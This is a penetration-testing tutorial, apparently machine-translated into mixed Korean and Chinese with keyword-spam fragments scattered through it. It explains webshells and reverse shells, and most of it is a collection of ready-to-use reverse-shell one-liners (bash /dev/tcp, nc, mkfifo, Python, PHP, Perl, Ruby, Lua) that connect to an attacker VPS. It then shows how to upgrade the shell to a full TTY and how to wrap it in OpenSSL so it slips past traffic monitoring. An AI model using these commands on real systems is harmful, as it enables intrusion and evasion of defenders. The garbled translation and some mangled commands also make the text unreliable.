> 시스템 튜토리얼 > 리눅스 > 쉘에 대한 심층적 이해: 침투 속 일반명사 분석 및 적용 시나리오

쉘에 대한 심층적 이해: 침투 속 일반명사 분석 및 적용 시나리오

王林
풀어 주다: 2024-06-13 21:26:03
원래의
1244명이 탐색했습니다.

深入了解 shell:渗透中常用名词解析及应用场景

조개란 무엇인가요

Shell은 getshell, webshell, crash shell 등 침투에서 흔히 사용되는 용어로 모두 쉘과 관련이 있습니다.

Baidu Encyclopedia에서 설명하는 쉘:

컴퓨터 과학에서 Shell은 (코어와 구별하기 위해) Shell이라고도 하는데, 이는 “사용자에게 운영 인터페이스를 제공한다

”라는 뜻입니다.

face” 소프트웨어(명령 구문 분석기)는 DOS 이상과 유사합니다

cmd.exe. 사용자 명령을 받은 후 해당 애플리케이션을 호출합니다.

간단히 말하면 사용자는 셸을 통해 운영 체제 커널의 서비스에 액세스합니다. 즉, 셸에서 커널까지 시스템 명령을 실행합니다.

getshell: 대상의 명령 실행 권한을 얻습니다

webshell: 웹 서비스를 통해 명령을 실행하는 웹사이트 사이드 도어 linux 커널 sprintf를 의미합니다

Dip 쉘: 명령줄의 입력 및 출력을 다른 호스트로 전송

왜 껍질을 버려야 할까요

1. 웹셸에서 명령을 실행할 때 상호 작용이 없습니다. 쉘링이나 기타 작업을 용이하게 하려면 쉘을 열어야 합니다.

2. 리바운드 쉘은 측면 도어를 추가하는 것과 동일합니다. 웹쉘이 발견되어 삭제되면 권한이 손실되지 않습니다.

Linux에서 셸을 충돌시키는 데 일반적으로 사용되는 방법

whereis 명령을 사용하여 대상에서 지원하는 콜백 기술을 확인합니다.

으아아아

linux 内核 sprintf_内核sprintf_内核管理器

linux 内核 sprintf_内核sprintf_内核管理器

bash가 쉘 충돌

Bash 콜백은 실제 전투에서 가장 많이 사용되는 방법입니다

으아아아

명령어를 분해하고 분석하세요:

1. bash는 로컬에서 bash를 여는 것을 의미합니다

2. /dev/tcp/는 Linux의 특수 장치입니다. 이 파일을 여는 것은 소켓 호출을 실행하고 소켓 연결을 구축하는 것과 같습니다.

3. >& 옆에 있는 /dev/tcp/ip/port 파일은 표준 출력 및 표준 오류 출력을 이 파일로 리디렉션하는 것을 의미하며, 이는 이를 원격 vps

로 전달합니다.

4. 원격 vps가 도청을 위해 해당 포트를 열면 이 bash의 표준 출력과 표준 오류 출력을 받게 됩니다.

nc 급락한 껍질

대상 호스트에 nc가 설치되어 있어야 합니다

으아아아

使用其他版本的nc

nc.traditional ip port -e /bin/sh
로그인 후 복사

linux 内核 sprintf_内核管理器_内核sprintf

内核sprintf_linux 内核 sprintf_内核管理器

配合命名管线进行大跌:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1 | nc ip port >/tmp/f
로그인 후 복사

python大跌shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("1.1.1.1",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
로그인 후 복사

首先使用socket与远程构建起联接,接出来使用到了os库的dup2方式将标准输入、标准输出、标准错误输出重定向到远程,dup2这个方式有两个参数,分别为文件描述符fd1和fd2,当fd2参数存在时,就关掉fd2,之后将fd1代表的那种文件强行复制给fd2linux之家,在这儿可以把fd1和fd2看作是C语言里的表针,将fd1形参给fd2,就相当于将fd2指向于s.fileno(),fileno()返回的是一个文件描述符,在这儿也就是构建socket联接返回的文件描述符,复印下来数值为3

0代表标准输入、1代表标准输出、2代表标准错误输出、3代表重定向到远程

接出来使用os的subprocess在本地开启一个子进程,传入参数“-i”使bash以交互模式启动,标准输入、标准输出、标准错误输出又被重定向到了远程,这样的话就可以在远程执行输入命令了。

php大跌shell

linux 内核 sprintf_内核sprintf_内核管理器

须要php关掉safe_mode选项,才可以使用exec函数。

使用php的exec函数执行方式1大跌shell的命令

php- 'exec("/bin/bash -i >& /dev/tcp/ip/port")'
로그인 후 복사

使用php的fsockopen去大跌shell

php -r '$sock=fsockopen("ip",port);exec("/bin/bash -i &3 2>&3");'
로그인 후 복사

其它大跌方式

exec大跌

0<&196;exec 196/dev/tcp/ip/port; sh &196 2>&196
로그인 후 복사

perl大跌

perl -e &#039;use Socket;$i="ip";$p=port;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};&#039;
로그인 후 복사

ruby大跌

ruby -rsocket -e&#039;f=TCPSocket.open("ip",port).to_i;exec sprintf("/bin/sh -i &%d 2>&%d",f,f,f)&#039;
로그인 후 복사

lua大跌

lua -e "require(&#039;socket&#039;);require(&#039;os&#039;);t=socket.tcp();t:connect(&#039;ip&#039;,&#039;port&#039;);os.execute(&#039;/bin/sh -i &3 2>&3&#039;);"
로그인 후 복사

内核管理器_linux 内核 sprintf_内核sprintf

获取一个完全交互shell

通过上述命令大跌shell得到的shell并不能称为完全交互的shell,一般称之为'哑'shell。

一般存在以下缺点

因而有必要去获取一个完全交互的shell。

1、在shell中执行python,使用pty模块,创建一个原生的终端,命令如下:

python -c &#039;import pty; pty.spawn("/bin/bash")&#039;
로그인 후 복사

隐藏

运行完后

2、键入Ctrl-Z暂停任务,切回到VPS的命令行中;在VPS中执行:

stty raw -echo 
fg #将后台运行或挂起的任务切换到前台运行
로그인 후 복사

内核管理器_内核sprintf_linux 内核 sprintf

3、在shell中执行,得到一个完全交互的shell,支持命令补全、历史命令查看、语法高亮、vim编辑等功能。

reset
export SHELL=bash
export TERM=xterm-256color
stty rows 54 columns 104
로그인 후 복사

内核管理器_内核sprintf_linux 内核 sprintf

内核sprintf_linux 内核 sprintf_内核管理器

SSL流量加密

部份防护设备会对内外网传输流量进行审查,大跌shell执行命令都是以明文进行传输的linux 内核 sprintflinux 命令,很容易被查杀。

因而须要将原始流量使用openssl加密,绕开流量审计设备。

1、首先vps上生成SSL证书的私钥/公钥对,信息懒得填,仍然回车即可。

openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes
로그인 후 복사

linux 内核 sprintf_内核sprintf_内核管理器

2、vps使用OpenSSL窃听一个端口

openssl s_server -quiet -key key.pem -cert cert.pem -port 8888
로그인 후 복사

内核sprintf_linux 内核 sprintf_内核管理器

3、目标主机执行回调加密shell

mkfifo /tmp/s; /bin/bash -i &1 | openssl s_client -quiet -connect ip:port > /tmp/s; rm /tmp/s
로그인 후 복사

内核sprintf_linux 内核 sprintf_内核管理器

大跌成功,成功接收到ssl流量加密的shell。

内核管理器_内核sprintf_linux 内核 sprintf

참고링크

위 내용은 쉘에 대한 심층적 이해: 침투 속 일반명사 분석 및 적용 시나리오의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!

원천:itcool.net
본 웹사이트의 성명
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.
인기 튜토리얼
더>
최신 다운로드
더>
웹 효과
웹사이트 소스 코드
웹사이트 자료
프론트엔드 템플릿